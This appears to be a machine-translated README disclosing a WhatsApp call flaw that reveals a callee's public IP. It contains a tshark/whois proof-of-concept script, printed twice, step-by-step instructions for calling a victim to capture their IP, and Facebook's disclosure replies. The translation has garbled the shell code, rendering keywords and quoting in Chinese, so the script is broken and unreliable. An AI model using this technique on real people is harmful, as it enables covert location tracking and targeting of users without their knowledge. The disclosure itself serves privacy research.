Whatsapp IP leak

該計劃僅出於教育目的。未經許可，請勿使用它。通常的免責聲明適用，尤其是我（BHDRESH）對直接或間接使用這些程序提供的信息或功能造成的任何損害不承擔任何責任。作者或任何互聯網提供商不承擔內容或濫用這些程序或其任何衍生產品的責任。通過使用此程序，您可以接受以下事實：由於使用這些程序，任何損壞，系統崩潰，系統妥協等）並不是BHDRESH的責任。

最後，這是一個個人發展，請尊重其哲學，不要將其用於壞事！

https://vimeo.com/577355374

所有平台上的WhatsApp應用程序的最新版本都容易受到遠程WhatsApp用戶公共IP披露的影響。

據觀察，在WhatsApp（語音 /視頻）調用期間，呼叫者側的應用程序試圖與收件人設備的公共IP地址建立直接連接。通過從目標主機過濾Facebook和WhatsApp服務器IP地址，可以在不知情的情況下揭示目標WhatsApp用戶的正確公共IP地址。

以下是一個快速腳本來利用此漏洞，

＃！/bin/sh

filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"

迴聲“按Enter並調用您的目標”。

讀行

tshark -i eth0 -l -t fields -f“ udp” -e ip.dst -y“ $ filter” -y'ip.dst！= 192.168.0.0/16和ip.dst！= 10.0.0.0.0/ 8和ip.dst！= 172.16.0.0/12“ |讀行時do whois $ line> /tmp /b

filter = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l

如果[“ $ filter” -gt 0];然後targetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:" echo $ line --- $ $ targetinfo fi完成

使用公共IP映射WhatsApp用戶的可能性不僅會揭示WhatsApp用戶的位置信息，而且還可以通過維護位置歷史記錄來濫用以跟踪其身體運動。也可能會濫用用戶到IP信息之間的直接映射，以跟踪用戶的衝浪習慣並影響他。

此外，可以利用公共IP來向WhatsApp用戶家庭或辦公室發起針對性的攻擊。

用戶：Usera是用戶b的WhatsApp細節

環境：不/a

瀏覽器：N/A。

應用程序：<=任何平台上的WhatsApp應用程序的最新版本

OS：除Web以外的所有平台

描述：USERA對用戶B進行了WhatsApp調用，並在沒有用戶B的知識的情況下捕獲了他的公共IP信息。視頻POC可以更好地了解步驟：https：//vimeo.com/577355374

步驟1：在攻擊者機器上啟動WiFi熱點，然後將攻擊者電話連接到攻擊者SSID

步驟2：在攻擊者機器上啟動POC腳本（下圖），該機器現在充當攻擊者電話的路由器

＃！/bin/sh

filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"

迴聲“按Enter並調用您的目標”。

讀行

tshark -i eth0 -l -t fields -f“ udp” -e ip.dst -y“ $ filter” -y'ip.dst！= 192.168.0.0/16和ip.dst！= 10.0.0.0.0/ 8和ip.dst！= 172.16.0.0/12“ |讀行時do whois $ line> /tmp /b

filter = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l

如果[“ $ filter” -gt 0];然後targetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:" echo $ line --- $ $ targetinfo fi完成

步驟3：隨機致電任何WhatsApp用戶以捕獲服務器IP地址以進行過濾

步驟4：致電受害者在他的whatsapp上

步驟5：建立後斷開電話連接

步驟6：腳本將揭示目標的公共IP地址

步驟7：在目標電話上驗證公共IP地址

1. 2020年10月14日 - 報告了Facebook的脆弱性
2. 2020年10月14日 - 來自Facebook的回复（感謝您的報告。在這種情況下，您所描述的問題實際上只是意圖的功能，因此沒有資格獲得賞金。）
3. 2020年10月14日 - 回复Facebook（您能否讓我知道WhatsApp用戶如何減輕意外披露他的IP和有關其位置的潛在私人信息？）
4. 2020年10月16日 - 後續電子郵件
5. 2020年10月20日 - Facebook的回應（由於對等方案的性質，對於可能關注意外披露的用戶的最佳方法是採用一種主動的方法。這可以包括限制對信任用戶的限製或使用VPN。 ）
6. 2021年1月18日 - 請求公開披露許可（在這種情況下，如果我在公開披露的情況下發布此發現是否可以嗎？）
7. 2021年1月18日 - Facebook的回應（決定出版的決定完全是您的。這樣做沒有罰款。）
8. 2021年3月20日- 與Facebook的進一步通信（在我的研究期間，信號已經引入了通過信號服務器中繼呼叫的功能以無效揭示IP地址。...您能否重新檢查該方法以將呼叫限制為可信賴的用戶或我相信一直使用VPN是保護位置隱私的可行解決方案。
9. 2021年3月23日 - 來自Facebook的回复（目前我們對當前的WhatsApp呼叫實施感到滿意）。
10. 2021年7月3日 - 公開披露